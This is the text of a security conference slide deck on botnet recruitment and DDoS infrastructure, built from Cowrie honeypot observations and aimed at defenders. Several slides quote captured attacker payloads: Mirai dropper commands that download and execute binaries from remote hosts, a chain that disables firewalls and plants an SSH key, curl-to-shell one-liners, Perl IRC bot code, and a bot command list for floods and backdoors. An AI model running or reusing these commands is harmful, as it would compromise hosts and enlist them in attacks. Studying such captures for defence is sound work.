  • 14. 14 14 Different Perspectives of a DDoS My Network / Infrastructure / Host Source Target / Victim Perspective Attacker Perspective x
  • 15. 15 15 Service & Attacker Infrastructure • Setting up the infrastructure • Misconfigured services – Servers - NTP, DNS, SSDP, etc – Amplification attack – Spoof source of request – https://stats.cybergreen.net/ – https://www.shadowserver.org/what-we- do/network-reporting/get-reports • Active bot “recruitment” – Internet exposed services – Vulnerable devices – Weak credentials
  • 16. 18 18 source Brute force: Username: admin password:12345 Remote Code Execution via Web interface Download Binary / Execute Scan and gain access Connect to Command and Control C & C “Recruitment Process” wget http://37.x.2x.190:80/13747243572475/hx86_64 2 1 Attacker
  • 17. 19 19 Telnet/SSH Honeypot (Cowrie) • Emulates SSH / Telnet – Allows attacker to log in • Emulates Linux/Unix environment – Captures command issued by attacker after login – Including download • ”Look and Feel” of Linux/Unix server and IoT devices • Attract certain class of attacks – Scan for SSH/Telnet – Bruteforce username/password – Login & execute payload(s) • Ddos Agents & Cryptominers – Based on post-login activities and binary collected Mirai sample – 2016
  • 18. 20 Successful Logins – New Honeypot { "eventid": "cowrie.login.success", "username": "root", "timestamp": "2018-10-07T19:31:50.568233Z", "message": "login attempt [root/taZz@23495859] succeeded", "src_ip": "123.b.c.12", "session": "fd7977b0b54a", "password": "taZz@23495859", "sensor": "mn-001" } { "eventid": "cowrie.login.success", "username": "root", "timestamp": "2018-10-07T19:31:59.378766Z", "message": "login attempt [root/taZz@23495859] succeeded", "src_ip": "80.x.y.62", "session": "fdcd399b1282", "password": "taZz@23495859", "sensor": "mn-001" } Check out: https://www.bankinfosecurity.com/botnets-keep-brute-forcing-internet-things-devices-a-
  • 19. 21 21 Execute Payload #!/bin/sh cd /tmp || cd /honme/$USER || cd /var/run || cd /mnt || cd /root || cd / wget http://185.10.68.175/bins/mirai.mips -O mirai.mips; busybox wget http://185.10.68.175/bins/mirai.mips -O mirai.mips; tftp -r mirai.mips -g 185.10.68.175; busybox tftp -r mirai.mips -g 185.10.68.175; chmod 777 mirai.mips; ./bins/mirai.mips; rm -rf mirai.mips
  • 20. 22 22 /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget - c http://116.211.145.29:8887/dx;chmod 777 dx;./dx;echo "cd /tmp/">>/etc/rc.local;echo "./dx&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5 O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJ e0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPe cjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8h Gmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKg AySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ echo -e "passwordn1o53kTj3yZq9n1o53kTj3yZq9"|passwd|bash system scheduler add name="U6" interval=10m on-event="/tool fetch url=http://spacewb.tech/poll/bd54f492-5909-49dd-bf2e-efbe029383ce mode=http dst- path=7wmp0b4s.rscrn/import 7wmp0b4s.rsc" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,wri te
  • 21. 23 my $process = $rps[rand scalar @rps]; my @rversion = ("Phl4nk"); my $vers = $rversion[rand scalar @rversion]; my @rircname = ("zombie"); my $ircname = $rircname[rand scalar @rircname]; chop (my $realname = $rircname[rand scalar @rircname]); my $nick =$rircname[rand scalar @rircname]; my $server = '125.x.y.z53'; my $port = '1947'; my $linas_max='8'; my $sleep='5'; my $homedir = "/tmp"; my $version = 'v.02'; my @admins = ("Nite","NiteMax","Nite123"); #my @hostauth = ("Nite"); my @channels = ("#VPS"); Perl Script command: uname -a & curl -O http://[xx].do.am/adm.txt ; perl adm.txt ; rm -rf adm.txt
  • 22. 24 24 if ($funcarg =~ /^flood/) { sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1========================================= "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1redu`s PerlBot Flood Help: "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1========================================= "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp1 <ip> <port> <time> "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp2 <ip> <packet size> <time> "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp3 <ip> <port> <time> "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1tcp <ip> <port> <packet size> <time> "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1http <site> <time> "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1ctcpflood <nick> "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1msgflood <nick> "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1noticeflood <nick> "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1========================================= "); } if ($funcarg =~ /^utils/) { sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1================================================== sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1redu`s PerlBot Utils Help: sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1================================================== sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1cback <ip> <port> sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1download <url+path> <file> sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1mail <subject> <sender> <recipient> <messa sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1dns <ip> sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1port <ip> <port> sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1portscan <ip> sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u pwd (for example) sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1================================================== }
  • 23. 25 * Non-spoof / non-root attacks: (can run on all bots) * * STD <ip> <port> <time> = A non spoof UDP HIV STD flooder * * HOLD <host> <port> <time> = A vanilla TCP connection flooder * * JUNK <host> <port> <time> = A vanilla TCP flooder (modded) * * UNKNOWN <target> <port, 0 for random> <packet size, 0 for random> <secs> = Another non- spoof udp flooder * HTTP <method> <target> <port> <path> <time> <power> = An extremely powerful HTTP flooder * * * Spoof / root attacks: * * DNS <target IP> <port> <reflection file url> <forks> <pps limiter, -1 for no limit> <time> = DNS amplification flooder, use with caution * BLACKNURSE <target ip> <secs> = An ICMP flooder that will crash most firewalls, causing them to drop packets. * * * Bot commands: * * AK-47SCAN <ON/OFF> = Toggles scanner. Started automatically. * * GETIP <iface> = gets the IP address from an interface * * FASTFLUX <iface> <ip> <port> = starts a proxy to a port on another ip to an interface (same port) * RNDNICK = Randomizes knight nickname * * NICK <nick> = Changes the nick of the client * * SERVER <server> = Changes servers * * GETSPOOFS = Gets the current spoofing * * SPOOFS <subnet> = Changes spoofing to a subnet * * DISABLE = Disables all packeting from the knight * * ENABLE = Enables all packeting from the knight * * KILL = Kills the knight * * GET <http address> <save as> = Downloads a file off the web * * VERSION = Requests version of knight * * KILLALL = Kills all current packeting * * HELP = Displays this * * IRC <command> = Sends this command to the server * * SH <command> = Executes a command * * BASH <command> = Run a bash command * * ISH <command> = Interactive SH (via privmsg) * * SHD <command> = Daemonize command * * INSTALL <http://server/bin> = Install binary (via wget) * * BINUPDATE <http://server/bin> = Update a binary (via wget) * * LOCKUP <http://server/bin> = Kill telnet, install a backdoor! * * * Source code of IRC based bot
  • 24. 26 26 Linux/Mirai – Fbot https://blog.malwaremustdie.org/2020/02/mmd-0065-2021- linuxmirai-fbot-re.html 2020-07-16T10:47:34.498718Z - URL seen http://5.x.y.228/bot.x86_64 on sensor 4da092c7-7234-48dc-a7ab- 7eb35979e847 and source ip: x.y.z.119 - ['root', 'juantech’] 2020-07-16T11:43:13.797645Z - http://5.x.y.228/bot.x86_64 on sensor f3fedbcf-e79e-44ef-9947-aca33701f8c2 and source ip: x.y.z.97 - ['root', 'hipc3518’]
  • 25. 27 27
  • 27. 31 31 curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh >/dev/null 2>&1 &
  • 28. 32 32 Snippet of shell script if [ ! -f "4d867bd38706a5f7" ]; then ARCH=$(getconf LONG_BIT) if [ ${ARCH}x = "64x" ]; then (curl -fsSL -m180 img.sobot.com/chatres/89/msg/20190814/ced05f4d38ac4090a3b8cb3196c6bd4f.png -o 4d867bd38706a5f7 ||wget -T180 -q img.sobot.com/chatres/89/msg/20190814/ced05f4d38ac4090a3b8cb3196c6bd4f.png -O 4d867bd38706a5f7 ||curl -fsSL -m180 never.b-cdn.net/x64 -o 4d867bd38706a5f7 ||wget -T180 -q never.b-cdn.net/x64 -O 4d867bd38706a5f7 ||curl -fsSL -m180 cdn.xiaoduoai.com/cvd/dist/fileUpload/1565754278188/3.1437250848801557.jpg -o 4d867bd38706a5f7 ||wget -T180 -q cdn.xiaoduoai.com/cvd/dist/fileUpload/1565754278188/3.1437250848801557.jpg -O 4d867bd38706a5f7)
  • 29. 33 33 Find hash related to URL serving Malware a5fba021a41c520a81647cda41110033eba 4f8842eb3239f227bcbb0b1b110d6
  • 30. 34 34
  • 31. 35 35 Rocke Gang 1. https://isc.sans.edu/diary/Vulnerable+Apache+Jenkins+exploited+in+the+wild/ 24916 (May 2019) 2. https://www.fortinet.com/blog/threat-research/rocke-variant-ready-to-box- mining-challengers (May 2019) 3. https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes- tactics-now-more-difficult-to-detect (Oct 2019) 4. https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to- evade-detection-by-cloud-security-products/ (Oct 2019)
  • 32. 36 36 www-data 17838 0.0 0.0 4452 636 ? S Mar20 0:00 sh -c /bin/bash -i -c '( while true ; do /var/www/[truncated]default/files/media-icons/xm2sg -l /var/www/[truncated]/files/media-icons/out.txt -o pool.minexmr.com:4444 -u 49DmzgK76Bo8WUa4LzTMs9TuT4Pj5FwM4FKuaN R1LmNvSPbPcTFi1ZsbVjJcQDY5hZ9i18A88g86Tfd Xi83P4uEoGyD5eTc.0+10000 -k >& /dev/udp/127.0.0.1/1 0>&1 ; if [ ! -f /var/www/[truncated]/files/media-icons/xm2sg ] || [ $? -eq 126 ]; then break; fi; sleep 1 ; done )
  • 33. 37 37 Analysis - Interesting indicators • IP addresses of host for initial access, run script to download binary/malware – Normally compromised systems • IP addresses of host serving binary/malware + other artefacts • IP addresses/domains of command and control • Binaries, scripts, malware samples, source code (+ hashes) • Ssh keys, webshells, Group names, irc #channels • Miner related information • Correlate with other observations, reports, etc
  • 35. 39 39 Lessons Learned • Context how can we “ improve” security ? • Bad Practices o Telnet enabled by default on devices o Weak or default credentials not removed o Services not developed securely o Services not deployed securely (i.e. management interfaces shouldn’t be exposed on the Internet) o No action upon notification (not our device, it is the customers) • Miscreants will exploit the weaknesess & monetize
  • 36. 45 45 Source IP from TO 2020-10-16T06:53:37.404513Z - cowrie : Traffic from IP address: x.z.y.56 src_port: 33903 dest_port: 23 ASN Info: XYZ , 38201 , x.z.y.0/21 AbuseIPDB
  • 37. 46 46 Back to the drawing Board? • Keeping the Internet safe and secure for _everyone_ • Education – Users, operators, developers • Governance – Incident Response – Roles and responsibilities – Accountabilities
  • 38. 48 Thank You! LinkedIn: Adli Wahid Email: adli@apnic.net Twitter: @adliwahid PGP: 0CA9 A0A3 42C0 241E 6AE9 B24C 53F7 CE5C 6352 3696 https://www.unsplash.com/adliwahid